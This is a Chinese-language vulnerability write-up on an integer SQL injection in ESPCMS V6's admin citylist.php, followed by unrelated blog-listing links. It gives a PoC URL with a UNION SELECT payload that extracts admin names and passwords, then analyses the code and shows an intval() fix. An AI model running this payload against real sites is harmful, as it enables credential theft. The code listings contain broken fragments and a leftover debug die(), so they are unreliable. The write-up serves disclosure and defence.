catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

Relevant Link:
2. 漏洞触发条件

0x1: POC

http://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20UNION%20select%201,2,concat%28name,0x7c,password%29,4,5%20FROM%20espcms_v6.espcms_admin_member

http://127.0.0.1/ESPCMSV6/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(name,0x7c,password),4,5 FROM espcms_v6.espcms_admin_member

3. 漏洞影响范围
4. 漏洞代码分析

/adminsoft/control/citylist.php

class important extends connector {

    function important() {

        $this->softbase(true);

    }

    function oncitylist() {

        //接收外部参数parentid

        $parentid = $this->fun->accept('parentid', 'R'); 

        $parentid = empty($parentid) ?  : $parentid;

        $verid = $this->fun->accept('verid', 'R');

        $verid = empty($verid) ?  : $verid;

        $db_table = db_prefix . 'city';

        $sql = "select * from $db_table where parentid=$parentid";

        die(var_dump($sql));

        $rs = $this->db->query($sql);

        for ($i = ; $rsList = $this->db->fetch_array($rs); $i++) {

            if ($verid == $rsList['id']) {

                $list.='<option selected value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';

            } else {

                $list.='<option value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';

            }

        }

        exit($list);

    }

}

继续跟进$parentid = $this->fun->accept('parentid', 'R');
/public/class_function.php

function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {

        switch ($var) {

            case 'G':

                $var = &$_GET;

                break;

            case 'P':

                $var = &$_POST;

                break;

            case 'C':

                $var = &$_COOKIE;

                break;

            case 'R':

                $var = &$_GET;

                if (empty($var[$k])) {

                    $var = &$_POST;

                }

                break;

        }

        //对输入进行了addslash转义,但是对Int整型注入没有效果

        $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], ) : NULL; 

        return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue;

    }

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2015-0163605

5. 防御方法

/adminsoft/control/citylist.php

class important extends connector {

    function important() {

        $this->softbase(true);

    }

    function oncitylist() {

        //接收外部参数parentid

        $parentid = $this->fun->accept('parentid', 'R');

        /**/

        $parentid = intval($parentid);

        /**/

        $parentid = empty($parentid) ?  : $parentid;

        $verid = $this->fun->accept('verid', 'R');

        $verid = empty($verid) ?  : $verid;

        $db_table = db_prefix . 'city';

        $sql = "select * from $db_table where parentid=$parentid";

        die(var_dump($sql));

        $rs = $this->db->query($sql);

        for ($i = ; $rsList = $this->db->fetch_array($rs); $i++) {

            if ($verid == $rsList['id']) {

                $list.='<option selected value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';

            } else {

                $list.='<option value="' . $rsList['id'] . '">' . $rsList['cityname'] . '</option>';

            }

        }

        exit($list);

    }

}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

ESPCMS /adminsoft/control/citylist.php Int SQLInjection Vul的更多相关文章

  1. Tutorial: WPF User Control for AX2012

    原作者: https://community.dynamics.com/ax/b/goshoom/archive/2011/10/06/tutorial-wpf-user-control-for-ax ...

  2. System.Windows.Forms.Control : Component, IOleControl, IOleObject, IOleInPlaceObject, IOleInPlaceActiveObject....

    #region 程序集 System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ...

  3. IEEEXtreme 10.0 - Always Be In Control

    这是 meelo 原创的 IEEEXtreme极限编程大赛题解 Xtreme 10.0 - Always Be In Control 题目来源 第10届IEEE极限编程大赛 https://www.h ...

  4. cocos2d-x 源代码分析 : control 源代码分析 ( 控制类组件 controlButton)

    源代码版本号来自3.1rc 转载请注明 cocos2d-x源代码分析总文件夹 http://blog.csdn.net/u011225840/article/details/31743129 1.继承 ...

  5. Linux ALSA声卡驱动之四:Control设备的创建

    声明:本博内容均由http://blog.csdn.net/droidphone原创,转载请注明出处,谢谢! Control接口 Control接口主要让用户空间的应用程序(alsa-lib)可以访问 ...

  6. ESPCMS-Seay自动加手工代码审计

    ESPcms代码审计 源码下载地址:http://yesky.91speed.org.cn/sw/180001_190000/rar/espcms_utf8_5.4.12.05.14.rar 1.自动 ...

  7. Spring Boot 乐观锁加锁失败 - 使用AOP恢复错误

    之前写了一些辅助工作相关的Spring Boot怎么使用AOP.这里继续正题,怎么减少Spring Boot 乐观锁加锁报错的情况(基本可以解决). 1. 包依赖 spring-boot-starte ...

  8. windows消息机制详解(转载)

    消息,就是指Windows发出的一个通知,告诉应用程序某个事情发生了.例如,单击鼠标.改变窗口尺寸.按下键盘上的一个键都会使Windows发送一个消息给应用程序.消息本身是作为一个记录传递给应用程序的 ...

  9. S3C2440UART之FIFO

    一.基础知识 S3C2440有3个独立的串口,每一个都可以利用DMA和中断方式操作.每个包含2个64字节FIFO,一个收,一个发.非FIFO模式相当于FIFO模式的一个寄存器缓冲模式.每一个UART有 ...

随机推荐

  1. 嵌入支付宝SDK,出现“LaunchServices: ERROR: There is no registered handler for URL scheme alipay”错误

    应用项目中嵌入支付宝SDK,在模拟器运行app后,会出现“LaunchServices: ERROR: There is no registered handler for URL scheme al ...

  2. centos6 pyotp bug修复

    yum install python-pip -ypip install pyotp vim /usr/lib/python2.6/site-packages/pyotp/utils.py... 49 ...

  3. java:利用xpath删除xml中的空节点

    原始xml内容: <data> <a> </a> <b>b1</b> <awb> <awbpre>123</a ...

  4. Pechkin:html -> pdf 利器

    Pechkin 是GitHub上的一个开源项目,可方便将html转化成pdf文档,使用也很方便,下面是winform项目中的示例代码: using System; using System.Diagn ...

  5. iptables/Netfilter 学习

    开始学iptables,因为它是和路由器技术紧密结合在一起的. iptables的命令看起来眼花缭乱,随便找两个: iptables -A FORWARD -p tcp -s -d -j ACCEPT ...

  6. 模拟MVC-WebForm实现ModelBinding

    (一) 前言                                                                           用ASP.NET MVC的时候,我们都 ...

  7. 如何在 apache 中设置缓存有效时间

    今天学习了下如何在 apache 中设置缓存时间,记之以备忘. 在 http 报文头中,与缓存时间有关的两个字段是 Expires 以及 Cache-Control 中的 max-age,Expire ...

  8. 用RxJava处理复杂表单验证问题

    用RxJava处理复杂表单验证问题 无论是简单的登录页面,还是复杂的订单提交页面,表单的前端验证(比如登录名和密码都符合基本要求才能点亮登录按钮)都是必不可少的步骤.本文展示了如何用RxJava来方便 ...

  9. 关于Node.js的httpClieint请求报错ECONNRESET的原因和解决措施

    背景说明 最近在工作项目中有下面一个场景: 使用Node.js的express框架实现了一个文件系统服务器端,其中有个API用于客户端上传文件.客户端使用Node.js的HttpClient来调用服务 ...

  10. sql 重复数据只保留一条

    用SQL语句,删除掉重复项只保留一条在几千条记录里,存在着些相同的记录,如何能用SQL语句,删除掉重复的呢1.查找表中多余的重复记录,重复记录是根据单个字段(peopleId)来判断 select * ...